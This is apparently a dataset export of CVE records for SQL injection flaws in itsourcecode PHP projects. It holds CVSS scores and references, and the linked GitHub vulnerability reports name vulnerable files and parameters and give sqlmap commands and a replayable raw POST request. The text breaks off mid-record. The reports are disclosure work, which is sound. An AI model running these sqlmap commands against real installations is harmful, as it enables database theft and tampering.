"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/AutoZhou1/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268699"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268699"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357243"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/AutoZhou1/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268699"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268699"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357243"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:learning_management_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD4B5F22-F2E1-4DDB-ABEA-61B253FE76F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/AutoZhou1/cve/issues/1 | [
"Exploit",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"AutoZhou1",
"cve"
] | # Itsourcecode Event Calendar In PHP v2.3 process.php v2.3 SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Event Calendar In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/learning-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Code099
## Vulnerable File
+ process.php
## VERSION(S)
+ v2.3
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2020/07/e-learningsystem1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'process.php' file of the 'Event Calendar In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "userId " and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="676" alt="1" src="https://github.com/AutoZhou1/cve/assets/66429903/90a74348-886f-46e7-b8d6-e943ec888fdd">
## Impact
+ Attackers only need to use registered regular users to exploit this SQL injection vulnerability for unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "userId " parameter, a serious SQL injection vulnerability was discovered in the login function of the " Event Calendar In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
+ UNION query
## Vulnerability location:
+ 'userId ' parameter
## Payload:
<img width="371" alt="2" src="https://github.com/AutoZhou1/cve/assets/66429903/724041a9-6ac9-438b-9e55-4df323df4833">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.210.199:1220/event-management/api/process.php?cmd=user&userId=16" --batch --dbs
```
<img width="372" alt="3" src="https://github.com/AutoZhou1/cve/assets/66429903/3fdb3715-d717-4a33-b946-0b565a58846c">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Event Calendar In PHP v2.3 process.php v2.3 SQL injection | https://api.github.com/repos/Code-099/cve/issues/1/comments | 0 | 2024-06-14T08:09:04Z | 2024-06-14T08:09:05Z | https://github.com/Code-099/cve/issues/1 | 2,352,801,293 | 1 | 6,072 |
CVE-2024-6013 | 2024-06-15T16:15:10.137 | A vulnerability was found in itsourcecode Online Book Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin_delete.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268721 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/gabriel202212/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268721"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268721"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357075"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/gabriel202212/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268721"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268721"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357075"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_book_store_project_in_php_and_mysql_with_source_code:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F4DCA80-C02C-4BE9-83EE-294CD8ECFDD1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/gabriel202212/cve/issues/1 | [
"Exploit",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"gabriel202212",
"cve"
] | # Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 admin_delete.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online-Bookstore-Project-In-PHP-Source-Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ momo2024
## Vulnerable File
+ admin_delete.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'admin_delete.php' file of the 'Online-Bookstore-Project-In-PHP-Source-Code' project. The reason for this issue is that attackers inject malicious code from the parameter "bookisbn" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="799" alt="1" src="https://github.com/gabriel202212/cve/assets/120346509/371f5579-ea08-4952-a5c1-ef80adbcb3fd">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "bookisbn" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Online-Bookstore-Project-In-PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ error-based
+ boolean-based blind
## Vulnerability location:
+ 'bookisbn' parameter
## Payload:
<img width="317" alt="2" src="https://github.com/gabriel202212/cve/assets/120346509/cc35e131-e3c4-4900-97be-c31e85ea8651">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u http://192.168.210.199:1213/admin_delete.php?bookisbn=978-1-49192-706-9 --batch --dbs
```
<img width="308" alt="3" src="https://github.com/gabriel202212/cve/assets/120346509/ef65cc0e-d814-4b37-9351-381061843aca">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 admin_delete.php SQL injection | https://api.github.com/repos/gabriel202212/cve/issues/1/comments | 0 | 2024-06-14T05:14:26Z | 2024-06-14T05:14:26Z | https://github.com/gabriel202212/cve/issues/1 | 2,352,524,829 | 1 | 6,073 |
CVE-2024-6014 | 2024-06-15T17:15:49.100 | A vulnerability classified as critical has been found in itsourcecode Document Management System 1.0. Affected is an unknown function of the file edithis.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268722 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/gabriel202212/cve/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268722"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268722"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357246"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/gabriel202212/cve/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268722"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268722"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357246"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:document_management_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B896ED3E-BEFB-4226-9F2E-D703C9765BB1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/gabriel202212/cve/issues/2 | [
"Exploit",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"gabriel202212",
"cve"
] | # Itsourcecode Document Management System Open Source PHP v1.0 edithis.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Document Management System Open Source PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/document-management-system-open-source-php/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ momo2024
## Vulnerable File
+ edithis.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Document-Management-System-Open-Source-PHP.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'edithis.php' file of the 'Document Management System Open Source PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input verification for the "id" parameter, a serious SQL injection vulnerability has been discovered in the login function of the "Open Source PHP Document Management System", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
```
POST /edithis.php HTTP/1.1
Host: 192.168.1.136:1218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: http://192.168.1.136:1218
Connection: close
Referer: http://192.168.1.136:1218/edit.php?id=53
Cookie: PHPSESSID=1i594prvla2q2dsj5lap862c21; pma_lang=zh_CN; phpMyAdmin=ko8qa99uju5lctb08ogcrf5aoq; pmaUser-1=%7B%22iv%22%3A%22NXm9yy854VNynCoqsh%5C%2FUwQ%3D%3D%22%2C%22mac%22%3A%2229fb2536c65b3242e4c4476cd8989d36995e3ed1%22%2C%22payload%22%3A%229LygwlrFaQRGZN6PlPkgOQ%3D%3D%22%7D; ci_session=guuo6qsad7alqoormqsr89o2d4pr111e; pmaAuth-1=%7B%22iv%22%3A%22s5BVhIF3MHposdoUOZXnhA%3D%3D%22%2C%22mac%22%3A%22c098ab0a8c7943bf5375e4ddeaecb3c8506a9457%22%2C%22payload%22%3A%22WBLv4ZtZ%5C%2FliduMTxZ3fFkZ3zPqIkeTmrJdXoCrqWCqM%3D%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=1
id=53&field1=101-2021&field2=external&field3=New+File1&field4=This+is+my+new+file&field5=1012021&field6=ITSOURCECODE&field7=Jude&field8=2021-03-22
```
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
## Vulnerability location:
+ 'id' parameter
## Payload:
<img width="944" alt="2" src="https://github.com/gabriel202212/cve/assets/120346509/b42337e7-f1d4-4c6e-864e-c5af6217f120">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r 123 --batch --dbs
```
<img width="558" alt="3" src="https://github.com/gabriel202212/cve/assets/120346509/0ec9d943-95b6-4b89-9cef-2fd7a1e11a3d">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Document Management System Open Source PHP v1.0 edithis.php SQL injection | https://api.github.com/repos/gabriel202212/cve/issues/2/comments | 0 | 2024-06-14T08:21:39Z | 2024-06-14T08:21:39Z | https://github.com/gabriel202212/cve/issues/2 | 2,352,823,423 | 2 | 6,074 |
CVE-2024-6015 | 2024-06-15T17:15:49.403 | A vulnerability classified as critical was found in itsourcecode Online House Rental System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument month_of leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268723. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
